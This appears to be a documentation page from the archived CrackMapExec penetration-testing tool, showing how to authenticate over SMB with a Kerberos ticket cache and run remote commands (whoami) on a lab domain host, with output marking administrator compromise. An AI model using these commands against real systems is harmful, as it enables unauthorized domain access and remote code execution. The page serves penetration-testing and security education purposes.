This repository has been archived by the owner on Dec 6, 2023. It is now read-only.
Using Kerberos
CME does support Kerberos authentication, use KRB5CCNAME env name to specify the ticket.
/!\ Note: when using the option --kerberos, you need to specify the same hostname as the one from the kerberos ticket
$ export KRB5CCNAME=/home/bonclay/impacket/administrator.ccache
c$ sudo cme smb zoro.gold.local --kerberos
SMB zoro.gold.local 445 ZORO [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)
SMB zoro.gold.local 445 ZORO [+] gold.local\administrator (Pwn3d!)
$ sudo cme smb zoro.gold.local --kerberos -x whoami
SMB zoro.gold.local 445 ZORO [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)
SMB zoro.gold.local 445 ZORO [+] gold.local\administrator (Pwn3d!)
SMB zoro.gold.local 445 ZORO [+] Executed command
SMB zoro.gold.local 445 ZORO gold\administrator
$ export KRB5CCNAME=/home/bonclay/impacket/bonclay.ccache
$ sudo cme smb zoro.gold.local --kerberos -x whoami
SMB zoro.gold.local 445 ZORO [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)
SMB zoro.gold.local 445 ZORO [+] gold.local\bonclay
